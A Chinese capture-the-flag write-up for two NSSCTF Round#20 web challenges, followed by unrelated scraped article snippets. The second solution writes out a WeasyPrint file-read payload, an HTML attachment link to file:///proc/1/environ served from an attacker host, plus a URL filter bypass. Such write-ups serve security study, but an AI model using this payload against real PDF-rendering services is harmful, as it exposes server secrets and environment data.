【Web】NSSCTF Round#20 Basic 个人wp

news/2024/5/19 21:36:19 标签: nssctf, web, ctf, wp, NSSCTF Round#20, binwalk, nss

目录

前言

真亦假,假亦真

CSDN_To_PDF V1.2


前言

感谢17👴没让我爆零

真亦假,假亦真

直接getshell不行,那就一波信息搜集呗,先开dirsearch扫一下

扫的过程中先试试常规的robots.txt,www.zip,shell.phps,.git,.svn,还有抓包看响应头响应体,均无果,最后扫出来是个/flag,乐

愉快地访问/flag即可 

CSDN_To_PDF V1.2

参考题目:[BUUCTF][FireshellCTF2020]URL TO PDF-CSDN博客

先随便试试

http://124.222.136.33:1337/1.hthtmlml#https://blog.csdn.net/Jayjay___/article/details/136978668

成功收到请求,注意到UA是WeasyPrint 

WeasyPrint是一个开源的HTML/CSS到PDF转换工具,它允许用户使用标准的Web技术(HTML和CSS)创建PDF文档。WeasyPrint能够解析HTML和CSS,并将其转换为可打印的PDF格式,支持诸如排版、布局、字体处理等功能。它是一个功能强大且灵活的工具,常用于生成报告、文档、电子书等需要打印或分享的内容。WeasyPrint是基于Python开发的,并且可以通过命令行或Python API进行使用。 

 vps上挂1.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
</head>
<body>
<link rel="attachment" href="file:///proc/1/environ">
</body>
</html>

payload:

http://124.222.136.33:1337/1.hthtmlml#https://blog.csdn.net/Jayjay___/article/details/136978668

下载拿到ouput.pdf,但是直接打开是不行的

 

binwalk来打开文件

拿到flag 


http://www.niftyadmin.cn/n/5460948.html

相关文章

文件格式转换服务器Morphos Server

什么是 Morphos Server &#xff1f; Morphos Server 是自托管文件格式转换服务器。新版本引入了将 PDF 文件转换为 DOCX 的功能&#xff0c;反之亦然。 目前支持的格式及转换矩阵如下&#xff1a; 图片转图片 PNGJPEGGIFWEBPTIFFBMPPNG✅✅✅✅✅JPEG✅✅✅✅✅GIF✅✅✅✅✅…

【Java】MyBatis快速入门及详解

文章目录 1. MyBatis概述2. MyBatis快速入门2.1 创建项目2.2 添加依赖2.3 数据准备2.4 编写代码2.4.1 编写核心配置文件2.4.2 编写SQL映射文件2.4.3 编写Java代码 3. Mapper代理开发4. MyBatis核心配置文件5. 案例练习5.1 数据准备5.2 查询数据5.2.1 查询所有数据5.2.2 查询单条…

Java数据结构-双向不带头非循环链表(模拟实现LinkedList)

目录 1. 双向不带头非循环链表的介绍2. 相关功能的实现2.1 基本框架2.2 size2.3 addFirst2.4 addLast2.5 addIndex2.6 contains2.7 remove2.8 removeAllKey2.9 clear 3. 全部代码 前面我们学习了最简单的链表&#xff1a;单链表&#xff0c;今天我们学习双向不带头非循环链表&a…

新网站秒收录技术,新网站百度收录时间

在建立新网站后&#xff0c;让它尽快被搜索引擎收录是网站主最为关注的事情之一。百度作为中国最大的搜索引擎&#xff0c;网站被其快速收录对于增加曝光和流量至关重要。本文将介绍一些新网站秒收录技术&#xff0c;以及一般情况下新网站被百度收录需要的时间。 新网站秒收录技…

Python之Opencv教程(4):识别图片中多张人脸

1、识别代码 导入必要的库 import cv2加载人脸识别器 face_detector cv.CascadeClassifier("data//haarcascade_frontalface_alt.xml")这里使用了OpenCV自带的人脸识别分类器&#xff0c;路径为cv2.data.haarcascades ‘haarcascade_frontalface_default.xml’。你…

Open CASCADE学习|Foundation Classes

本手册介绍了如何使用Open CASCADE Technology&#xff08;OCCT&#xff09;基础类。它提供了有关基础类的基本文档。 基类提供各种通用服务&#xff0c;如自动动态内存管理&#xff08;通过句柄操作对象&#xff09;、集合、异常处理、通过下转换的泛型和插件创建。 基础类包…

Kimball维度模型之迟到的事实

在数据仓库建设的过程中&#xff0c;面对不断涌现的数据和信息&#xff0c;处理“迟到的事实”是一个至关重要的挑战。所谓“迟到的事实”&#xff0c;指的是在数据仓库已经建立并开始运行后&#xff0c;新增的数据或信息却具有之前时间戳的情况。这可能由于数据采集的延迟(比如…

算法学习——LeetCode力扣动态规划篇8

算法学习——LeetCode力扣动态规划篇8 300. 最长递增子序列 300. 最长递增子序列 - 力扣&#xff08;LeetCode&#xff09; 描述 给你一个整数数组 nums &#xff0c;找到其中最长严格递增子序列的长度。 子序列 是由数组派生而来的序列&#xff0c;删除&#xff08;或不删…